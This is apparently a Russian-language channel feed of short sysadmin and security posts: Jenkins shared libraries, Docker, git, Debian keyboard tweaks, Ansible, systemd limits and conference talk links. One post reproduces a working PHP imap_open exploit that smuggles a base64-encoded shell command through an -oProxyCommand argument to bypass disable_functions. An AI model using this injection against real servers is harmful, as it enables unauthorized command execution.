Jenkins global pipeline

В jenkins есть такая удобная штука, которая называется Global Pipeline Libraries. Найти можно по пути manage jenkins -> configure system. Фишка этой штуки заключается в том, что можно описать в некотором репозитории список функций, а затем в любом pipeline эти функции каждый раз писать уже не надо и ваш jenkinsfile может состоять вообще из вызова одной функции с какими-то специфичными для этого pipeline параметрами.

Экономит время, когда у вас множество одинаковых проектов.

#jenkins

Нападение без объявления войны

я хз че это было, но вы поймете когда вам это понадобится))

https://github.com/moby/moby/blob/master/contrib/init/systemd/docker.socket

(Ну а так, ошибка такая: docker.service: Failed to schedule restart job: Unit docker.socket not found.)

#docker #troubleshooting

Git show commits made by user

git log --author="Jon"

#git

MacBook reverse fn keys (debian)

try:
# echo 2 > /sys/module/hid_apple/parameters/fnmode

make persistent:

# echo options hid_apple fnmode=2 >> /etc/modprobe.d/hid_apple.conf
# update-initramfs -u -k all

#keyboard

Дружно передаем привет чуваку с ником crlf, который заресерчил багу и выложил таск по выполнению кода с обходом disable_functions в PHP, используя функцию imap_open (и некоторые особенности в Debian/Ubuntu).
На секундочку, это 0day!
Эксплойт с выполнением команды echo '1234567890'>/tmp/test0001:

<?php
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

Обязательно читаем подробности тут.
Чуть ниже есть презентация Twoster'а с конференции KazHackStan, ему тоже передаем привет!

Алерт! Традиционный хак-квест от команды wallarm в самом разгаре!

Для участия подключайся к запрещённому в этой стране мессенджеру и пиши в личку @offzone_hq_bot, он тебе всё расскажет. Несколько интересных заданий по вебу и ограниченное количество времени. Завтра (16 ноября) в 5 часов будут подведены итоги. Топ10 участников получат ценные призы, не забудь проверить скорборд перед тем как покинуть конфу!

Стандарты говорят нам о том, что нужно использовать не только пароль, а ещё какой-нибудь второй фактор для генерации одноразового пароля. Google, duo, authy и другие предлагают нам свои услуги по генерации второго фактора. Но на все есть свои стандарты. Давайте посмотрим, насколько они безопасны

#redteam
#crypto

https://www.unix-ninja.com/p/attacking_google_authenticator

MacBook swap alt and command keys (debian)

try:
# echo 1 | sudo tee /sys/module/hid_apple/parameters/swap_opt_cmd

make persistent:

# echo options hid_apple swap_opt_cmd=1 >> /etc/modprobe.d/hid_apple.conf
# update-initramfs -u -k all

#keyboard

Macbook swap fn and l_control key (debian)

допиленный модуль, который позволяет делать некоторые нестандартные вещи.

https://github.com/free5lot/hid-apple-patched

#keyboard

Итак, пришло время первых публикаций! Начнем с презентации "DNS Rebinding в 2k18", которая была представлена на прошедшей 14-15 ноября конференции @offzone_moscow нашими спикерами Скуратовым Андреем и Фирстовым Михаилом.

https://speakerdeck.com/fbkcs/dns-rebinding-in-2k18

Записи докладов DEFCON Moscow 15

Скляров Дмитрий - Ключи безопасности Intel ME. Генеалогия, обфускация и прочая магия. https://youtu.be/2djUuSLaRGU

Скуратов Андрей и Мигалин Сергей - DNS-туннелирование в 2018. Что есть и что с этим делать? https://youtu.be/W3ciW_sF08Y

Белов Сергей - По ту сторону BugBounty. https://youtu.be/gRbB5n48p5s

Лопаницын Антон - Предварительная разведка веб-приложений. https://youtu.be/ad80Ue-_nis

Волков Дмитрий - Приватные мессенджеры без боли: они существуют? https://youtu.be/3fpbm_FTO7M

sourcegraph теперь self-hosted

Sourcegraph is a code search and browsing tool with code intelligence that helps developers write and review code.

https://docs.sourcegraph.com/#quickstart

News for ansible

Оказывается теперь (проверено для версии 2.7) можно (и нужно) делать вот так:

- name: Install necessary pkgs
  apt:
    name: ['libssl1.0.0', 'apt-transport-https']
    update_cache: yes

и не использовать конструкцию with_items.

#ansible

Переустанавливаем пакет с восстановлением конфигов

apt install --reinstall -o Dpkg::Options::="--force-confask,confnew,confmiss" packagename

#apt

- name: Install necessary pkgs
  apt:
    name: ['libssl1.0.0', 'apt-transport-https']
    update_cache: yes

касательно этого - вот документация о том что происходит:

https://docs.ansible.com/ansible/2.7/porting_guides/porting_guide_2.7.html#using-a-loop-on-a-package-module-via-squash-actions

This functionality has been supported in most modules since Ansible 2.3.

Настраиваем лимиты с systemd

Directive   ulimit equivalent Unit
————————————————————————————————————————
LimitCPU=        ulimit -t   Seconds
LimitFSIZE=      ulimit -f   Bytes
LimitDATA=       ulimit -d   Bytes
LimitSTACK=      ulimit -s   Bytes
LimitCORE=       ulimit -c   Bytes
LimitRSS=        ulimit -m   Bytes
LimitNOFILE=     ulimit -n   Number of Descriptors
LimitAS=         ulimit -v   Bytes
LimitNPROC=      ulimit -u   Number of Processes
LimitMEMLOCK=    ulimit -l   Bytes
LimitLOCKS=      ulimit -x   Number of Locks
LimitSIGPENDING= ulimit -i   Number of Signals
LimitMSGQUEUE=   ulimit -q   Bytes
LimitNICE=       ulimit -e   Nice Level
LimitRTPRIO=     ulimit -r   Realtime Priority
LimitRTTIME=     No equivalent

Прописывается итоговое значение в директиву [Service] Unit-файла.

источник

Ansible escape single quotes

U can do with another quote, as PyYAML docs say.

---
- name: test
  hosts: localhost
  gather_facts: False
  tasks:
    - local_action: 'echo ''{"a": 1, "b": 2}'''

#ansible